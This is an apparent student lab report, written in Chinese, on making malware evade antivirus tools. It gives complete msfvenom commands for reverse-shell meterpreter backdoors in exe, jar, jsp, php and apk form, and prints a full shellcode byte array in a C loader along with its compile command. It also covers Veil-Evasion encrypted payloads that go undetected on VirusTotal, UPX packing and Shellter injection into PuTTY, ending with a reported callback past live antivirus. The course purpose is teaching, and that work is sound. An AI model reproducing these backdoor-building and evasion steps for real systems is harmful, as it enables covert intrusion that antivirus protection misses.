#2019-2020-2 20175317钟睿文《网络对抗技术》Exp3 免杀原理与实践
1.1 实践目标
(1l)任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧
(2)任务二:通过组合应用各种技术实现恶意代码免杀
(3)任务三:用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本
1.2 基础知识
免杀原理
免杀技术全称为反杀毒技术Anti Anti- Virus简称“免杀”,它指的是一种能使病毒木马免于被杀毒软件查杀的技术。由于免杀技术的涉猎面非常广,其中包含反汇编、逆向工程、系统漏洞等黑客技术,所以难度很高。其内容基本上都是修改病毒、木马的内容改变特征码,从而躲避了杀毒软件的查杀。
如果要做好免杀,就要清楚杀毒软件(恶意软件检测工具)是如何工作的。AV(Anti-virus)是很大一个产业。
任务一:正确使用免杀工具或技巧
1.正确使用msf编码器
在实验二中已经生成了未经编码处理exe类型的后门程序,将其放到VirusTotal或Virscan(网站链接在文末参考资料中)中查看结果,这里由于VirusTotal中的杀软数量远多于Virscan,所以我选择了VirusTotal:
由此可见不加任何处理的后门程序能够被大多数杀软检测到,接下来用msf编码器对后门程序进行一次到多次的编码,并进行检测
-e
用来选择编码器-b
用来去除需要去除的字符,应使'\x00'不出现在shellcode中,因为shellcode以'\x00'为结束符-i
设置迭代次数,这里设置迭代次数为10
生成一次编码的后门程序:
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.122.136 LPORT=5317 -f exe > exp3.exe
生成十次编码的后门程序:
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=192.168.122.136 LPORT=5317 -f exe > encoded10.exe
由此可见经过编码后虽然被检测出的概率下降了,但是大多数杀软还是可以将其检测出来。
2.msfvenom生成如jar之类的其他文件
- 生成jar文件:
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.122.136 LPORT=5317 x> 20175317jar.jar
VirusTotal检测结果:
- 生成jsp文件:
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.122.136 LPORT=5317 x> 20175317jsp.jsp
VirusTotal检测结果:
- 生成php文件:
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.122.136 LPORT=5317 x> 20175317php.php
VirusTotal检测结果:
- 生成apk文件:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.122.136 LPORT=5317 x> 20175317apk.apk
VirusTotal检测结果:
3.使用veil-evasion生成后门程序
使用sudo apt-get install veil
进行veil的安装
安装完成后提示有的部分没有安装成功,根据提示加后缀重新进行安装:
安装完成后输入veil
命令,这里使用热点进行安装会快很多,这里安装python会无响应……下载完成后会提示运行/usr/share/veil/config/setup.sh --force --silent
但是在运行该指令时会反复提示找不到wine32
,提示apt-get install wine32
,但是安装的时候又…… o_o ....
上网查了一下,要执行如下指令安装wine32
:
mkdir -p ~/.cache/wine
cd ~/.cache/wine
wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86.msi
wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86_64.msi
之后把veil卸掉重新安装一遍就能成功了:
使用sudo运行veil,输入use evasion
之后输入命令use c/meterpreter/rev_tcp.py
进入配置界面
使用set LHOST 192.168.122.136
设置反弹连接IP地址
使用set LPORT 5317
设置端口
使用generate
命令生成文件,接着输入生成的playload的名称veil20175317
,保存路径为/var/lib/veil/output/source/veil20175317.exe
按老规矩丢到virustotal中看看veil生成的隐蔽性如何 (●'◡'●)
结果显示我们费九牛二虎之力下的veil效果也不是太好,依然有过半的杀软可以把它揪出来 ╯︿╰
4.使用C+shellcode编程生成后门程序
使用如下指令生成shellcode:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.122.136 LPORT=5317 -f c
创建20175317.c,将buf添加到代码中
unsigned char buf[] =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
"\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c"
"\x77\x26\x07\x89\xe8\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54"
"\x50\x68\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x68\xc0\xa8\x7a\x88"
"\x68\x02\x00\x14\xc5\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50"
"\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5"
"\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x67"
"\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff"
"\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68\x00\x10\x00\x00"
"\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56"
"\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58"
"\x68\x00\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5"
"\x57\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\x0f\x85"
"\x70\xff\xff\xff\xe9\x9b\xff\xff\xff\x01\xc3\x29\xc6\x75\xc1"
"\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5";
int main()
{
int (*func)() = (int(*)())buf;
func();
}
使用i686-w64-mingw32-g++ 20175317.c -o 20175317.exe
生成exe可执行文件
丢到virustotal中看看效果:
看样子在大多数杀软面前还是会露出狐狸尾巴……
5.加壳工具
使用命令upx 20175317.exe -o 20175317pro.exe
对20175317.exe加壳
上传到virustotal中:
加壳以后能够检测出的杀软少了,但是过半的杀软还是可以检测出的。
6.其他方法
采用Veil-Evasion的其他荷载生成后门方式 进入evasion,使用list查看可用的有效荷载:
我选择的是第32个荷载,是Python下shellcode在DES下加密一种
输入option
查看有效荷载的选项
修改用户名后使用generate
生成,选择shellcode平台时选择2:msfvenom,payloads与IP、端口号使用tab自动获取
输入生成文件的文件名,选择Py2Exe生成exe文件
之后,生成的rc文件放入了路径/var/lib/veil/output/handlers/
中,可执行文件放入了/var/lib/veil/output/source/
中
将可执行文件上传到virustotal中看看效果:
这下所有杀软都没有检测出来 ○( ^皿^)っ
任务二:通过组合应用各种技术实现恶意代码免杀(如果成功实现了免杀的,简单语言描述原理,不要截图。与杀软共生的结果验证要截图。)
任务一中最后一个采用Veil-Evasion生成的Python下shellcode在DES下加密文件已经可以通过杀软检查,所以这步中我使用了Python下shellcode使用DES加密的载荷+加密壳生成的文件:
电脑环境:win10主机 杀毒引擎:火绒 杀软版本:2.8.90.11211
木马库版本时间:2020-03-24
PS:我在网上还查找找到了使用Shellter注入动态Shellcode注入来实现免杀的效果,当用户打开被植入后门的软件时,只有触发一定的操作才会启动后门。 执行apt-get install shellter
安装shellter,这里选择AutoA
然后输入需要注入的exe文件路径
设置相应的地址与端口
最后就成功生成了
放到主机中也没有被查杀到,杀软对动态shellcode好像反应不是那么灵敏:
任务三:用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本
电脑环境:win10主机 杀毒引擎:火绒 杀软版本:2.8.90.11211 木马库版本时间:2020-03-24
实验中遇到的问题
问题一:安装veil的过程中一直提示缺少wine32
,提示apt-get install wine32
,安装时又会显示无法获取
问题一解决方案:在安装前执行如下指令安装wine32
:
mkdir -p ~/.cache/wine
cd ~/.cache/wine
wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86.msi
wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86_64.msi
执行完成后就可以顺利进行安装了。
问题二:shellter输入需要注入的exe文件路径后注入失败
问题二解决方案:通过查询了解到shellter需要注入SSH/Telnet程序以实现传输,所以需要下载PuTTY,PuTTY是一个免费的SSH/Telnet程序。此外,shellter的这个特性也限制了其应用,它只能用于局域网内。下载PuTTY后经过重新注入发现shellter可以注入到PuTTY.exe中。
实验收获与感想
在本次实验过程中我使用了几种不同的方法进行免杀尝试,做出VirusTotal杀不出的恶意代码时的感受比cs上段的感觉还要爽! 通过本次实践我进一步理解了免杀原理,同时对杀毒软件的可靠性有了新的认识( ̄▽ ̄)原来扫描后显示没有病毒不代表真的没有病毒,所以我们要从源头抓起,不浏览不安全的网页,不下载运行不明文件,减少恶意代码植入的机会。
问题回答
- (1)杀软是如何检测出恶意代码的?
a.通过检测代码中的特征码或者某些特征片段,将其于自己的特征码库进行比对,如代码中检测出特征码或者某些特征片段,就将其判定为恶意代码。
b.监控进程行为有无异常,如果在运行时出现了非法越权行为等,就将其判定为恶意代码。
- (2)免杀是做什么?
通过对恶意代码加壳或者进行编码等操作,隐藏代码中的特征码或者某些特征片段,起到混淆视听的作用,使得杀软不容易检测出该恶意代码,起到免杀的作用。
- (3)免杀的基本方法有哪些?
a.改变特征码 使用encoder进行编码、重新编译生成可执行文件、加壳等手段改变特征码
b.改变行为
使用加密通信、增加正常功能的代码、使用隧道技术通讯等躲避或混淆杀毒软件起到免杀的作用
开启杀软能绝对防止电脑中恶意代码吗?
不能,通过本次实验已经能看出杀软不能检测出所有的恶意软件,杀软的病毒库中如果没有记录该特征片段,或着没有检测该恶意代码的有效手段则无法检测到该恶意代码,就不能及时杀掉电脑中的恶意代码。
参考资料
VirusTotal Virscan Kali Linux之软件安装、卸载、更新和修改更新源 MSF-Shellcode生成和使用 简介三款免杀工具(含BLACKHAT最新工具)